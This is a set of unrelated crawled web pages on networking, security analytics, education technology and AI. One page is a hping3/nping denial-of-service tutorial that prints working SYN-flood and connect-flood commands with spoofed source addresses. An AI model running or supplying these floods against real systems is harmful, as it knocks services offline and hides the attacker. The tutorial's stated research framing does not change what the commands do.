s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00451.warc.gz
en
0.955606
914
2.890625
3
First off, the Cookie Law Explained The Cookie Law or formally known as the GDPR privacy laws that will come into force on May 25, 2018, within the EU, this piece of privacy legislation will require websites to get consent from visitors to store or retrieve any information on a computer, smartphone or tablet. It was designed to protect online privacy, by making consumers aware of how information about them is collected and used online, and give them a choice to allow it or not, a little history and a good explanation can be found here: Cookie Law FAQ This law applies to any business anywhere that has a website (no matter the location) serving customers within any EU country and is required to comply with the legislation with respect to those EU visitors and that country. What are Cookies and Why? A cookie is a small piece of data sent from a website and stored on the user's computer by the user's web browser while the user is browsing. Cookies were designed to be a reliable mechanism for websites to remember stateful information or to record the user's browsing activity, the single most important job of a cookie is to keep a user logged in as they browse from page to page, tab to tab, this is stateful information. Why do we use these tracking Technologies and where? - Analytical data for the proposes of tracking website usage. - Contact Forms, so we can respond to you. - E-Shop, so we can process your requests keep track of your orders etc. - We only keep data where we may have legal obligations to do so, such as financial transactions or where you opted in/out of a service we offer. - In most cases, cookies, session data and user data are set to expire within 24 hours with the exception of the e-shop or subscription services. For further information about how to do so, please refer to your browser ‘help’ / ‘tool’ or ‘edit’ section or see: manage cookies Please note that if you use your browser settings to block all Cookies (including strictly necessary Cookies) you may not be able to access or use all or parts or functionalities of our Sites. If you want to remove previously-stored Cookies, you can manually delete the Cookies at any time. However, this will not prevent the Sites from placing further Cookies on your device unless and until you adjust your Internet browser setting as described above. Some useful links
<urn:uuid:46909352-61f4-41b3-bb19-d0714370d648>
CC-MAIN-2022-40
https://cfts.co/administrative-information/policies-and-notices
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337524.47/warc/CC-MAIN-20221004184523-20221004214523-00451.warc.gz
en
0.934684
685
2.671875
3
Today, CISOs and their teams are being asked lots of questions about risk by different types of stakeholders. Many of these questions require security professionals to analyze raw data from multiple sources, then communicate insight about impact exposure or priorities that's meaningful to people who are not security pros. This goal has many challenges, such as understanding raw data and analyzing it to produce accurate information that's helpful to a particular person's decision making context. This is a skill in itself, and one that data scientists are uniquely placed to provide. Security's Analysis and Communication Challenge CISOs often face questions from business or governance, risk management, and compliance stakeholders that operational tools can't answer. This is either because tools are designed to meet a single operational security need rather than correlate data to answer a business risk question, or because tools are designed to "find bad" and detect when something goes wrong rather than enumerate risk. As a result, someone in the security team eventually must extract raw data from a technology "Frankenstack," put it into an analysis tool (spreadsheets by default), and then torture the data for answers to questions that inevitably get more complex over time. This is all before working out how best to communicate the output of data analysis to clearly answer "So what?" and "What now?" How Data Science Can Help Asking questions of raw data from one source, let alone multiple sources, isn't easy. First you have to understand the data that your security tools put out and any quirks that exist (such as timestamps and field names). In data science, data preparation is one of the most important stages of producing insight. It involves understanding what questions a data set can answer, the limits of the data set (that is, what information is missing or invalid), and looking at other data sets that can improve completeness of analysis where a single data set is not sufficient. Then comes the job of selecting the most appropriate analysis method to answer the question at hand. Data scientists have a spectrum of methods they can use, which are suitable for extracting different information from data. Data science as a discipline will consider multiple factors to deliver the most meaningful information in the time available, all with appropriate caveats. For example, what is the current state of knowledge on this topic? What does the consumer of analysis want to know? The answers here will set the bar for the complexity of analysis required to learn something new. For example, if a data set hasn't been analyzed before, simple stats can provide valuable insight quickly. Then there's the inevitable trade-off between speed to results on one hand and precision on the other. Based on all this, the best analysis method could be simple counts or using a machine learning algorithm. Finally comes communication. What view of the data does a decision maker need? For example, the view of vulnerability will be different for a CISO who needs insight for a strategic quarterly meeting when compared with a vulnerability manager who needs to prioritize what to fix at a tactical level. While these views will be built from the same raw data, the summary for each requires different caveats, because as you summarize, you inevitably exclude details. Merging Data Science and Domain Expertise Data scientists can't, and shouldn't, work in a silo away from the security team. Far more value is gained by combining their expertise in understanding, analyzing, and communicating data with the domain expertise of security professionals who understand the problem and the questions that need answering. As more security departments start working with data scientists, here are three key factors to bear in mind: - Time: Understanding multiple data sets, applying the most relevant analysis techniques to them, and delivering meaningful insights based on what question needs answering won't happen overnight. It takes time. - Domain expertise: There will be gaps in knowledge between your data scientist and your security team. Working in close partnership is critical. Just as you're getting used to constraints the data scientist has discovered in the data you have, so too is your data scientist coming to grips with new and usually complex log formats in an effort to see what's possible. - The needs of your consumers: Communicating and visualizing insight from data requires different analysis for different roles. The CISO, control manager, IT operations, and C-suite all have different needs — and your data scientist must learn about these roles to strike the right balance between conclusions and caveats for each one. - Data Manipulation: An Imminent Threat - Avoiding The Blame Game For A Cyberattack - The New Security Mindset: Embrace Analytics To Mitigate Risk
<urn:uuid:2954cf56-4afd-4d56-9b6d-432eace2a6e0>
CC-MAIN-2022-40
https://www.darkreading.com/threat-intelligence/data-science-security-overcoming-the-communication-challenge
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00451.warc.gz
en
0.938759
938
2.53125
3
A VLAN is a group of switch ports administratively configured to share the same broadcast domain. Private VLANs – Private VLANs (PVLANs) are used mainly by service providers. The main purpose of Private VLAN (PVLAN) is to provide the ability to isolate hosts at Layer 2 instead of Layer 3. By using PVLAN we are splitting that domain into some smaller broadcast domains. In other words we may summarize Private VLAN as ” VLANs in VLAN “. Below tables enlists the difference between both: Comparison Table: VLAN vs Private VLAN |1||Different Vlans must belong to different IP subnets.||PVLANs belong to the same IP subnet |2||Vlan works in Layer 2 and Layer 3 ||PVLAN is method to segment device at layer 2 |3||Vlan is the basic requirement for all LAN | |PVLANs are required for specific requirements wherein endpoints of same VLAN should not communicate to each other. E.g. – Mainly in ISP scenarios to prevent different customer from communicating to each other on same LAN segment. |4||Intervlan communication is performed at L3 SVI level||PVLAN to outside communication is performed via Primary VLAN. Download the difference table: VLAN vs Private VLAN.
<urn:uuid:cd542fa0-3623-46e3-b656-eed0c75b867d>
CC-MAIN-2022-40
https://ipwithease.com/vlan-vs-private-vlan/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335124.77/warc/CC-MAIN-20220928051515-20220928081515-00651.warc.gz
en
0.852633
319
3.28125
3
A capacitor is a passive electronic component that stores electrical energy in an electrostatic field. This is unlike a battery, which stores energy in a chemical form. Capacitors are formed from two conducting plates separated by an insulator. The amount of capacitance is proportional to the surface areas of the plates, and inversely proportional to the separation between the plates. Nanomaterial supercapacitors use nanomaterials, which dramatically increases the surface area and the amount of energy that can be stored.
<urn:uuid:bb6a354d-b169-48de-80d3-b7aaa0b45cb6>
CC-MAIN-2022-40
https://www.gartner.com/en/information-technology/glossary/nanomaterial-supercapacitors
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00651.warc.gz
en
0.920048
101
3.796875
4
Maintenance Robots are the Future The Wall Street Journal says that factory workers have a new sense of job security, so let's ruin it. This week, Rolls-Royce offered an exciting new look at the future of engine maintenance. Well, it's exciting to everyone except maybe maintenance professionals. Rolls-Royce partnered with Harvard University and the University of Nottingham to discuss the role robotics will play in the future of engine maintenance. The company calls it the IntelligentEngine and the technologies could not only speed inspection and maintenance work, but could also reduce the cost as engines could stay on the aircraft. At the Farnborough Airshow, Rolls-Royce showed off four technologies currently in various stages of development: INSPECT robots, remote boreblending roots, FLARE robots, and SWARM robots. The INSPECT robots are a network of periscopes that are embedded into the engine to detect any anomalies. The remote boreblending robots could be an answer to the skills shortage as it's a tool that local teams would install in the engine and then hand over remote access to specialist engineers — and we're talking about mission critical parts, like repairing damages blades with lasers. The FLARE robots are a pair of snake robots that that work like an endoscope to make patch repairs, and the SWARM robots are a set of small 10-mm robots that would be deployed in the center of an engine, via a snake robot, and perform visual inspections. Some technologies, like the SWARM robots, are far from a reality, but the remote robot is already being tested. It will be interesting to see if and when these technologies spread to other industries. Flying Bum Gets Luxurious The Airlander 10 has been called the world's biggest aircraft, but it is likely most famous for its nickname, the "Flying Bum". A hybrid of a blimp, helicopter and airplane, the 302-foot Airlander 10 is powered by four 325-hp turbocharged diesel engines and can fly for days at a time. But we haven't heard much from the Flying Bum over the last two years. Other than bad news, like in August 2016 when the blimp-shaped airship sustained damage after a rough landing, or when it broke free of its mooring mast in November 2017 and deflated as a safety precaution. The aircraft was originally developed for the U.S. military for use in surveillance. However, according to New Atlas, Hybrid Air Vehicles (HAV), the company behind the Flying Bum, is developing a luxury version of the airship aimed at the tourism market. The company revealed concept photos at the Farnborough International Airshow that were designed by UK-based Design Q. They include glass bottoms, luxury seating throughout a 150-foot passenger cabin, an Altitude Bar, and private bedrooms. The luxury edition is designed to accommodate 19 passengers at a a time, hopefully not all in the bedroom at the same time. Engineers Sign Pledge Against Killer Robots Engineers, scientists, tech leaders and hosts of weekly engineering shows have signed a pledge against killer robots. The statement was signed by 2,400 individuals, including Elon Musk, Toby Walsh, and yours truly who promise to "neither participate in nor support the development, manufacture, trade, or use of lethal autonomous weapons". The pledge was organized by the Future of Life Institute and released at the 2018 International Joint Conference on Artificial Intelligence in Stockholm. According to a recent report, the industry employs about 300,000 AI engineers, so either the pledge didn't have good word of mouth, or 99.992% of AI professionals are hellbent on the fall of man. The issue at hand is killer robots also known, perhaps ironically, as lethal autonomous weapons systems (or LAWS). These are weapons that can identify, target, and kill a person, without a human 'in-the-loop'. The pledge is a call to governments and leaders to help create a future with laws against LAWS. Toby Walsh, a professor of artificial intelligence at Australia's University of New South Wales in Sydney, said "We cannot hand over the decision as to who lives and who dies to machines." Here is the pledge: Artificial intelligence (AI) is poised to play an increasing role in military systems. There is an urgent opportunity and necessity for citizens, policymakers, and leaders to distinguish between acceptable and unacceptable uses of AI. In this light, we the undersigned agree that the decision to take a human life should never be delegated to a machine. There is a moral component to this position, that we should not allow machines to make life-taking decisions for which others – or nobody – will be culpable. There is also a powerful pragmatic argument: lethal autonomous weapons, selecting and engaging targets without human intervention, would be dangerously destabilizing for every country and individual. Thousands of AI researchers agree that by removing the risk, attributability, and difficulty of taking human lives, lethal autonomous weapons could become powerful instruments of violence and oppression, especially when linked to surveillance and data systems. Moreover, lethal autonomous weapons have characteristics quite different from nuclear, chemical and biological weapons, and the unilateral actions of a single group could too easily spark an arms race that the international community lacks the technical tools and global governance systems to manage. Stigmatizing and preventing such an arms race should be a high priority for national and global security. We, the undersigned, call upon governments and government leaders to create a future with strong international norms, regulations and laws against lethal autonomous weapons. These currently being absent, we opt to hold ourselves to a high standard: we will neither participate in nor support the development, manufacture, trade, or use of lethal autonomous weapons. We ask that technology companies and organizations, as well as leaders, policymakers, and other individuals, join us in this pledge. This is Engineering By Design.
<urn:uuid:77e88728-4038-4b5a-a437-cc14fee0df8a>
CC-MAIN-2022-40
https://www.mbtmag.com/home/video/21102073/engineering-by-design-engineers-sign-pledge-against-killer-robots
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00651.warc.gz
en
0.948337
1,207
2.6875
3
Federal Government agencies have released report after report (since 1999 with Columbine) pointing out the same thing, there is no profile of mass shooters. So you might be asking, how can we prevent something we can’t profile? The good news is, there is something we can profile, and that’s failed prevention efforts. If we can profile failed preventions, we can turn those lessons learned into lessons implemented. Click play to learn more, then visit the Prevention Deeper Dive to see what the 20+ years of research reveal. Ready for more? Prevention & Lessons Learned Deeper Dive A LESSON LEARNED IS KNOWLEDGE GAINED FROM INCIDENTS, NEAR MISSES, TRAGEDIES, LAWSUITS, ETC. KNOWLEDGE GAINED FROM LESSONS LEARNED ARE JUST “RECIPES” UNTIL THEY BECOME LESSONS IMPLEMENTED THAT EMPOWER AND EQUIP PEOPLE WITH THE RIGHT STRATEGIES AND TOOLS TO TAKE REAL ACTIONS THAT LEAD TO BETTER RESULTS. Lessons Learned from attacks, cyberattacks, violence, suicide, and other incidents are shared in numerous news articles across numerous websites, software updates, press releases, etc. on a daily basis and could even be coming directly from your internal departments too. Watch the 15-minute video below to take a deeper dive into 20+ years of research so you can get better prevention results today! Not seeing the form to request information? Drop us a line and we’ll send you more information!
<urn:uuid:a4761ad9-8995-4f48-b995-a241e3cc5c83>
CC-MAIN-2022-40
https://www.awareity.com/2021/06/17/prevention-profile-of-mass-shooters-vs-profile-of-failed-preventions/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00651.warc.gz
en
0.85169
334
2.546875
3
In computing, a denial-of-service (DoS) or distributed denial-of-service (DDoS) attack is an attempt to make a machine or network resource unavailable to its intended users. Although the means to carry out, the motives for, and targets of a DoS attack vary, it generally consists of efforts to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet. In this article I will show how to carry out a Denial-of-service Attack or DoS using hping3 with spoofed IP in Kali Linux. As clarification, distributed denial-of-service attacks are sent by two or more persons, or bots, and denial-of-service attacks are sent by one person or system. As of 2014, the frequency of recognized DDoS attacks had reached an average rate of 28 per hour. Perpetrators of DoS attacks typically target sites or services hosted on high-profile web servers such as banks, credit card payment gateways, and even root nameservers. Denial-of-service threats are also common in business, and are sometimes responsible for website attacks. This technique has now seen extensive use in certain games, used by server owners, or disgruntled competitors on games, such as popular Minecraft servers. Increasingly, DoS attacks have also been used as a form of resistance. Richard Stallman has stated that DoS is a form of ‘Internet Street Protests’. The term is generally used relating to computer networks, but is not limited to this field; for example, it is also used in reference to CPU resource management. One common method of attack involves saturating the target machine with external communications requests, so much so that it cannot respond to legitimate traffic, or responds so slowly as to be rendered essentially unavailable. Such attacks usually lead to a server overload. In general terms, DoS attacks are implemented by either forcing the targeted computer(s) to reset, or consuming its resources so that it can no longer provide its intended service or obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately. Denial-of-service attacks are considered violations of the Internet Architecture Board’s Internet proper use policy, and also violate the acceptable use policies of virtually all Internet service providers. They also commonly constitute violations of the laws of individual nations. hping3 works well if you have other DoS tools such as GoldenEye running (using multiple tools that attacks same site/server/service increases the chances of success). There are agencies and corporations to runs DoS attack map in Realtime. that shows worldwide DDoS attacks almost in realtime. Our take on Denial-of-service Attack – DoS using hping3 Let’s face it, you installed Kali Linux to learn how to DoS, how to crack into your neighbors Wireless router, how to hack into a remote Windows machine be that a Windows 2008 R2 server or Windows 7 or learn how to hack a website using SQL Injection. There’s lot’s of guide that explain it all. In this guide, I am about to demonstrate how to DoS using hping3 with random source IP on Kali Linux. That means, - You are executing a Denial of Service attack or DoS using hping3 - You are hiding your a$$ (I meant your source IP address). - Your destination machine will see source from random source IP addresses than yours (IP masquerading) - Your destination machine will get overwhelmed within 5 minutes and stop responding. Sounds good? I bet it does. But before we go and start using hping3, let’s just go over the basics.. hping3 is a free packet generator and analyzer for the TCP/IP protocol. Hping is one of the de-facto tools for security auditing and testing of firewalls and networks, and was used to exploit the Idle Scan scanning technique now implemented in the Nmap port scanner. The new version of hping, hping3, is scriptable using the Tcl language and implements an engine for string based, human readable description of TCP/IP packets, so that the programmer can write scripts related to low level TCP/IP packet manipulation and analysis in a very short time. Like most tools used in computer security, hping3 is useful to security experts, but there are a lot of applications related to network testing and system administration. hping3 should be used to… - Traceroute/ping/probe hosts behind a firewall that blocks attempts using the standard utilities. - Perform the idle scan (now implemented in nmap with an easy user interface). - Test firewalling rules. - Test IDSes. - Exploit known vulnerabilties of TCP/IP stacks. - Networking research. - Learn TCP/IP (hping was used in networking courses AFAIK). - Write real applications related to TCP/IP testing and security. - Automated firewalling tests. - Proof of concept exploits. - Networking and security research when there is the need to emulate complex TCP/IP behaviour. - Prototype IDS systems. - Simple to use networking utilities with Tk interface. hping3 is pre-installed on Kali Linux like many other tools. It is quite useful and I will demonstrate it’s usage soon. DoS using hping3 with random source IP That’s enough background, I am moving to the attack. You only need to run a single line command as shown below: root@kali:~# hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source www.hping3testsite.com HPING www.hping3testsite.com (lo 127.0.0.1): S set, 40 headers + 120 data bytes hping in flood mode, no replies will be shown ^C --- www.hping3testsite.com hping statistic --- 1189112 packets transmitted, 0 packets received, 100% packet loss round-trip min/avg/max = 0.0/0.0/0.0 ms root@kali:~# Let me explain the syntax’s used in this command: hping3= Name of the application binary. -c 100000= Number of packets to send. -d 120= Size of each packet that was sent to target machine. -S= I am sending SYN packets only. -w 64= TCP window size. -p 21= Destination port (21 being FTP port). You can use any port here. --flood= Sending packets as fast as possible, without taking care to show incoming replies. Flood mode. --rand-source= Using Random Source IP Addresses. You can also use -a or –spoof to hide hostnames. See MAN page below. www.hping3testsite.com= Destination IP address or target machines IP address. You can also use a website name here. In my case resolves to 127.0.0.1 (as entered in So how do you know it’s working? In hping3 flood mode, we don’t check replies received (actually you can’t because in this command we’ve used –rand-souce flag which means the source IP address is not yours anymore.) Took me just 5 minutes to completely make this machines unresponsive (that’s the definition of DoS – Denial of Service). In short, if this machine was a Web server, it wouldn’t be able to respond to any new connections and even if it could, it would be really really slow. Sample command to DoS using hping3 and nping I found this article which I found interesting and useful. I’ve only modified them to work and demonstrate with Kali Linux (as their formatting and syntaxes were broken – I assume on purpose :) ). These are not written by me. Credit goes to Insecurety Research Simple SYN flood – DoS using HPING3 root@kali:~# hping3 -S --flood -V www.hping3testsite.com using lo, addr: 127.0.0.1, MTU: 65536 HPING www.hping3testsite.com (lo 127.0.0.1): S set, 40 headers + 0 data bytes hping in flood mode, no replies will be shown ^C --- www.hping3testsite.com hping statistic --- 746021 packets transmitted, 0 packets received, 100% packet loss round-trip min/avg/max = 0.0/0.0/0.0 ms root@kali:~# Simple SYN flood with spoofed IP – DoS using HPING3 root@kali:~# hping3 -S -P -U --flood -V --rand-source www.hping3testsite.com using lo, addr: 127.0.0.1, MTU: 65536 HPING www.hping3testsite.com (lo 127.0.0.1): SPU set, 40 headers + 0 data bytes hping in flood mode, no replies will be shown ^C --- www.hping3testsite.com hping statistic --- 554220 packets transmitted, 0 packets received, 100% packet loss round-trip min/avg/max = 0.0/0.0/0.0 ms root@kali:~# TCP connect flood – DoS using NPING root@kali:~# nping --tcp-connect -rate=90000 -c 900000 -q www.hping3testsite.com Starting Nping 0.6.46 ( http://nmap.org/nping ) at 2014-08-21 16:20 EST ^CMax rtt: 7.220ms | Min rtt: 0.004ms | Avg rtt: 1.684ms TCP connection attempts: 21880 | Successful connections: 5537 | Failed: 16343 (74.69%) Nping done: 1 IP address pinged in 3.09 seconds root@kali:~# Source: Insecurety Research Any new and modern firewall will block it and most Linux kernels are built in with SYN flood protection these days. This guide is meant for research and learning purpose. For those who are having trouble TCP SYN or TCP Connect flood, try learning IPTables and ways to figure out how you can block DoS using hping3 or nping or any other tool. You can also DoS using GoldenEye that is a layer 7 DoS attack tool to simulate similar attacks or PHP exploit to attack WordPress websites. p.s. I’ve included hping3 manpage in the next page in case you want to look that one up. Please share and RT.
<urn:uuid:5963a1a2-a5c9-4326-affe-8dee4a62e4ab>
CC-MAIN-2022-40
https://www.blackmoreops.com/2015/04/21/denial-of-service-attack-dos-using-hping3-with-spoofed-ip-in-kali-linux/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00651.warc.gz
en
0.878402
2,336
2.96875
3
With technological advancements becoming more integrated into education standards, each year experts predict that the tipping point is coming, when digital resources such as online coursesand tablet-based teaching implements become so intertwinedthat they become inseparable from our notion of basic education. While those predictions have yet to fully pan out, Dr. Michael Fullan, Professor Emeritus at the Ontario Institute for Studies in Education at the University of Toronto, expects 2013 to be the year school districts finally make the leap into 21st Century technology. A successful implementation of new tech, however, depends on the willingness of North American teachers to embrace the shifting academic landscape. Keeping up with tech trends The esteemed professor recently lent his expertise on education to MindShare Learning, offering his predictions for the coming year. He found that technological innovation in the classroom will rely heavily on teachers’ ability to implement those changes, as well as a commitment to their own continued education in the form of Professional Development. Teachers who are serious about staying up to date with the latest tech trends and their potential educational applications will go to great lengths to keep themselves apprised of emerging technology and become acquainted with its functionality. Professional Development is key Fullan expects more teachers to embrace Professional Development in 2013, predicting that the number of professional learning communities (PLCs) will continue to rise as educators develop a network of resources to keep their knowledge of educational technology relevant. Examining a study conducted by the Stanford Center for Opportunity Policy in Education, Education Week found a positive correlation between the performance of a country’s education system and the amount of time its teachers dedicated to professional development. Educators have more resources for professional development at their disposal than ever before, with webinars, online courses and social media options becoming more prevalent. If a teacher wants to expand his or her expertise on an emerging high-tech teaching implement, the resources to do so are plentiful. Better resources in the classroom Teachers can expect better support from their school districts, as well. Fullan suggested the declining costs of computers, tablets and internet installation will likely lead to better resources being available to educators. Fullan expects school board leaders to begin to acknowledge the importance of having quick, easily accessible computers in the classroom and will move to outfit them with the latest models. An increased adoption rate of BYOD policies should further supplement the quality of computers available in schools, as teachers are increasingly allowed to bring in their personal laptops and tablets to replace sluggish and outdated classroom computers. With better hardware, teachers can begin to integrate emerging educational advancements such as online courses and textbooks into the classroom experience. There are many roadblocks to full-scale implementation of the newest educational innovations. Budget concerns, teachers’ unfamiliarity with recent technological advancements and a public distrust of change all stand in the way of making the blended classroom a reality. However, as costs go down, the public and teachersbecome more tech savvy, school districts are becoming more willingto embrace a new academic landscape, where teaching resources are as much digital as they are physical. Will 2013 be a landmark year for technological innovation in schools? Are blended classrooms the future of academics in North America? Should they replace the old model of primary and secondary education? Tell us what you think in the comments section below!
<urn:uuid:85c9b3ac-eecb-4234-b11f-c7233ecc8ad5>
CC-MAIN-2022-40
https://www.faronics.com/news/blog/teachers-to-jump-into-the-tech-waters-in-2013
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00651.warc.gz
en
0.96059
661
3.09375
3
The router operating system is a piece of software responsible for managing the router resources by controlling and allocating memory, prioritizing system requests and processes, controlling I/O devices and managing file systems. The most two famous router operating systems are Cisco IOS and Juniper JUNOS. Cisco IOS is a monolithic OS which means it runs as a single operation with all processes sharing the same memory space. This means a bug in one process can impact or corrupt other processes also means that adding new features to the OS requires upgrading the full IOS image itself. JUNOS is a modular operating system with a FreeBSD based kernel. All processes run in separate modules and protected memory spaces. This modularity enhances uptime of the router because bugs will not affect the entire operating system and new features can be added without disabling the operating system or requiring a full upgrade. Cisco is actually overcoming these limitations by introducing new modular versions of the IOS like IOS XR and IOS XE that are based on dedicated kernels. Both operating systems are almost identical in the normal processes and features that are based on technology standards. thats all for today.Please share your comments,ideas or questions.
<urn:uuid:2e79521b-3cce-4e23-ae2f-45e033632f36>
CC-MAIN-2022-40
https://www.networkers-online.com/blog/2008/07/routers-operating-systems/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00651.warc.gz
en
0.936346
248
2.96875
3
Artificial Intelligence already impacts many of our daily activities. When asking Siri for directions or the recommendations on what to watch on Amazon prime or Netflix and even when getting a fraud alert from your bank, all of them are curated based on AI. This Machine Learning technology has an impact and continues to do so in education, healthcare, human resources, marketing, banking among others. But can AI help with sustainability? What about climate change? Can AI technologies really be deployed to help transform the only planet we live on, protecting the environment and biodiversity? Can this technology embrace going green?? The answer is a big YES. AI shapes our present and will for sure keep doing so in the future. In the words of Andrew Ng, a computer scientist and Coursera co-founder, AI is the new electricity. Ng explains that AI. will transform every industry in the next several years just as electricity transformed everything 100 years ago. “I actually have a hard time thinking of an industry that I don’t think AI will transform in the next several years,” Ng points out. Without doubt, AI has grown sharply, in scope and application and it is estimated that by 2030, AI will contribute up to 15.7 trillion of the global economy. In addition to that, AI levers globally can in parallel reduce worldwide GHG emissions by up to 4.0% in 2030, an amount of 2.4 Gt CO₂e, equivalent to the 2030 annual emissions of Australia, Canada and Japan combined. We need to create a safer and conscientious future In this scenario, environmental sustainability becomes a critical issue and its protection has become a serious consideration across countries. Climate change, rising pollution levels, high carbon emissions are among the battles we are facing and it’s imperative that we take concrete steps in the protection of the planet. Today not only the tech world but the business world are debating about the importance of artificial intelligence for a more sustainable future. We all need to work on transforming industries, markets, and behaviors to change the course of climate change and create a safer and conscientious digital future. Moreover, although we might think that artificial intelligence is a few years away from showing any real impact, the fact is that this is already happening and we must work on better ways to look after our environment. Therefore AI may be a good ally to enhancing sustainability helping to build a better and greener world for all of us. In this article, we’ll explore how AI may be a game changer for environmental issues. AI is making the energy industry greener Renewable energy generation is growing rapidly and this transition to low-carbon energy systems is using AI to predict the demand and supply of energy, improve storage and assist in its efficient use. According to the latest report from a United Nations climate panel, between 3.3 billion and 3.6 billion people – more than 40% of the world’s population – live in places and in situations that are “highly vulnerable to climate change”. So taking actions over this topic is essential. AI has the potential to reshape the renewable energy industry completely, swapping daily tasks for more sustainable/eco-friendly alternatives that reduce the effect we have on our environment. For example, AI is used to better forecast the short- and long-term energy needs of an area, including prediction of weather conditions to manage fluctuations. AI and smart cities, from controlling traffic and waste to environmental issues According to the United Nations Department of Economic and Social Affairs, 55% of the world’s population lives in urban areas. This is expected to rise to 68% by 2050. Apart from that, a study by McKinsey found that technology can lead to improvements in certain key quality of life indicators by 10-30%. That is why some cities are already working on making more sustainable environments for those living there. By using AI technologies smart cities are able to control traffic, waste and maintenance as well as predicting the energy consumption, pollution risks, and the effects on the environment. For instance, AI is used to monitor and optimize traffic flows in real-time, reducing queuing, and enforce real-time smart pricing for vehicle tolls. Another improvement AI brings to our daily lives in the city has to do with Identity verification technologies. Biometrical solutions mean a better and improved management of data as well as paperless and energy saving workplaces. Did you ever stop and think how much plastic, paper, ink, and energy is consumed by producing, for example health insurance cards or rewards cards? Or the pollution levels involved in traveling to and back from work? Biometrics not only help reduce environmental footprint but also offer a secure alternative that saves resources but also adds security layers to every action we do online. Biometrics gives users the possibility to prevent data leaks, protect devices, reduce fraud, streamline employee processes in addition to more efficient customer services that benefits working remotely and offers users efficient protection against threats. AI for a better and more accurate agriculture Based on the United Nations’ prediction data on population and hunger, a 60% increase in food productivity will be needed to feed the world’s population. Just in the U.S growing, processing and distributing food is a $1.7 trillion business, according to the U.S. Department of Agriculture’s Economic Research Service. This makes AI an important partner for agricultural services. AI can help transform production by better monitoring and managing environmental conditions and crop yields. This technology may be an ally in detecting disease in crops, pests and poor nutrition of farms. AI can notice and target weeds and then decide which herbicide should be applied, helping reduce usage of herbicides and cost savings. Also AI robotics can be programmed to carry out agricultural tasks autonomously such as an autonomous tractor picking fruit only when ripe. A.I can help predict extreme weather conditions in a glance Reliable forecasts can predict hazardous weather―such as hurricanes, floodings and high winds― 9/10 days before the event occurs. These technology -based forecasts can play a critical role for many industries, including water conservation, energy demand, and disaster preparedness. Accurate predictions and data on extreme weather conditions give communities and essential sectors more time to prepare for and mitigate potential disasters. AI a good partner for biodiversity conservation For conservation specialists and biologists, AI becomes an alternative to manually processing huge amounts of data from species. The process of collecting and identifying data on different species and organisms is tiresome and really time consuming. However, algorithms could significantly reduce this time. On the other hand, experts can make crucial decisions about future biodiversity management by using artificial intelligence to learn from past environmental change. Another clear example has to do with illegal deforestation. According to FAO, between 2015 and 2020, the rate of deforestation was estimated at 10 million hectares per year. The area of primary forest worldwide has decreased by over 80 million hectares since 1990. AI can analyze satellite data, or ground based sensors, to monitor forest conditions in real-time and at scale, providing early warning systems for priority investigation and pattern analysis. These examples may go on and on. Nowadays there’s a wide variety of machine learning developments based on AI empowering us to better manage the impacts of climate change and protecting the environment. Artificial intelligence can strongly tackle some of the world’s biggest problems but although it may be of great use it also needs to be supported by the necessary regulatory insight. To ensure these technologies reach their potential and can start helping countries grow their economies, we need governments, educators, technologists and businesses to work together on regulations and laws that keep pace with technology. We need to work on ensuring an earth friendly AI that can bring real solutions to environmental issues and create a healthier and greener future. So sustainability is possible with AI and fighting climate change too. It’s up to us to create room for the positive innovation that AI can bring with the right regulations and support. Each of us has a role to play, let’s start now.
<urn:uuid:3c237e85-0277-4bee-9ff1-10793782d453>
CC-MAIN-2022-40
https://hummingbirds.ai/why-is-ai-an-ally-to-empower-a-greener-future/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337529.69/warc/CC-MAIN-20221004215917-20221005005917-00651.warc.gz
en
0.944819
1,645
3.375
3
A new paper on so-called ‘black-box’ AI models reveals the dangers of our increasing dependence on opaque systems – and offers up a method for combating prejudiced AI. Just last week, we reported on the UK Financial Stability Board’s warning that the use of AI and machine learning could compound any future financial crisis. Now, research published on academic journal database arXiv has highlighted another harmful aspect of our dependency on automated risk assessment. In short, it could be prejudiced, to harmful effect. Black-box risk scoring AIs can be found throughout our financial and criminal justice systems. They are adept at processing vast quantities of data to determine whether an individual meets the desired risk criteria to qualify for a loan or be granted bail. Through machine learning, such systems evolve over time, identifying trends and making associations within the information they’re processing. Read more: SAP: Banks must prepare for open banking age Are we making AIs prejudiced? However, these AIs are only as capable as their models (and the data they are fed) permit them to be. While it is usually illegal to consider factors such as race in these cases, black-box AIs are typically opaque in their methods. Algorithms can recognize that education levels or addresses correlate with other demographic information. The institutions using them either don’t fully understand their AI’s methods or are using proprietary products, the workings of which suppliers refuse to divulge. There is a very real danger that the limited data sets and methods used by these systems is resulting in unethical bias. This latest report, Detecting Bias in Black-Box Models Using Transparent Model Distillation, is led by Sarah Tan of Cornell University and provides the means to rid our AIs of prejudice. Model distillation is a method of improving the performance of almost any machine learning algorithm by training numerous different models on the same data and then averaging their predictions. The output of these ‘teacher models’ is distilled into a faster, simpler ‘student model’, without significant loss of accuracy. How can we better understand AI? Tan’s method differs in that it uses two labels to train the AI – a risk score and the actual outcome the risk score was intended to predict. Her team have outlined how these labels relate to each other in a way that eliminates their bias. They achieve this by assessing whether contributions of protected features to the risk score are statistically different from contributions to the actual outcome. In the past, more transparent models such as this have resulted in reduced prediction accuracy – creating tension between less transparent but more accurate models and clearer but less precise solutions. When the decision could determine whether an individual is granted bail or a loan, it’s a 